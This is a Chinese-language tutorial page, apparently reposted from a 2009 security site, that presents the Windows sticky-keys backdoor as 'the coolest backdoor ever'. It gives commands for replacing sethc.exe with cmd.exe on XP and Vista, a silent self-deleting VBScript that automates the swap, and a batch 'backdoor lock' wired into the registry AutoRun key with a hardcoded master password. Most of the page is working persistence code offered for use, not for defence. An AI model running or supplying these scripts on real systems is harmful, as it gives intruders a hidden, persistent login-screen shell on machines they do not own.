当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 变态入侵:有史以来最酷的Windows后门

安全基础
入侵常用TCP端口作用及其操作建议之二十九
玩转XP系统中的一些另类卸载
移动硬盘常见问题的解决(1)
移动硬盘常见问题的解决(2)
使用RSS能做的十六件事
Win XP系统19例常见问题(1)
Win XP系统19例常见问题(2)
Win XP系统19例常见问题(3)
Win XP系统19例常见问题(4)
企业安全管理从IP地址开始
计算机取证常识
深入剖析EFS
WinXP另类垃圾的清理(1)
WinXP另类垃圾的清理(2)
WinXP另类垃圾的清理(3)
WinXP另类垃圾的清理(4)
给Windows XP标题栏瘦瘦身
体验Windows XP的网络视频会议(1)
体验Windows XP的网络视频会议(2)
交换网络中的嗅探和ARP欺骗

安全基础 中的 变态入侵:有史以来最酷的Windows后门


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-19   浏览: 149 ::
收藏到网摘: n/a

  后门原理:

  在Windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

  XP:

  将安装源光盘弹出(或将硬盘上的安装目录改名)
  cd %widnir%\system32\dllcache
  ren sethc.exe *.ex~
  cd %widnir%\system32
  copy /y cmd.exe sethc.exe

  VISTA:

  takeown /f c:\windows\system32\sethc.exe
  cacls c:\windows\system32\sethc.exe /G administrator:F
  然后按XP方法替换文件

  在登录界面按5此SHIFT,出来cmd shell,然后……

  后门扩展:
  
  Dim obj, success 
  Set obj = CreateObject("WScript.Shell") 
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True) 
  success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) 
  success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) 
  success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) 
  success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) 
  success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 

  第二句最有意思了.自动应答....以前就遇到过类似的问题

  再更新.加个自删除,简化代码... 

  On Error Resume Next 
  Dim obj, success 
  Set obj = CreateObject("WScript.Shell") 
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 
  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

  后门锁扩展:

 

  allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证

  用下面的后门锁的方法是 把代码保存为bdlock.bat

  然后修改注册表位置即可

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
  "AutoRun"="bdlock.bat"

  @Echo Off
  title 后门登陆验证
  color a
  cls
  set temprandom=%RANDOM%
  echo 请输入验证码:%temprandom%
  set/p check=
  if "%check%"=="%temprandom%%temprandom%" goto passcheck
  if "%check%"=="%temprandom%" (
  rem 后门服务器验证
  rem 如果没有后门验证服务器请rem注释掉下一行代码
  if exist \192.168.8.8\backdoor$\pass goto passcheck
  )
  echo 验证失败
  pause
  exit
  :passcheck
  echo 验证成功
  If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx
  Set passcmdlock=http://blog.csdn.net/freexploit/
  :allyesno
  Set Errorlevel=>nul
  Echo 请输入验证密码?
  Set password=allyesno Is a pig>nul
  Set/p password=
  rem 万能密码
  if "%password%"=="allyesno is a sb" goto endx
  If %time:~1,1%==0 Set timechange=a
  If %time:~1,1%==1 Set timechange=b
  If %time:~1,1%==2 Set timechange=c
  If %time:~1,1%==3 Set timechange=d
  If %time:~1,1%==4 Set timechange=e
  If %time:~1,1%==5 Set timechange=f
  If %time:~1,1%==6 Set timechange=g
  If %time:~1,1%==7 Set timechange=h
  If %time:~1,1%==8 Set timechange=i
  If %time:~1,1%==9 Set timechange=j
  set/a sum=%time:~1,1%+%time:~1,1%
  Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul 
  If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
  Echo 请联系客服咨询正确密码!&Goto allyesno
  :End
  Set password=>nul
  Set Errorlevel=>nul
  Echo

  :endx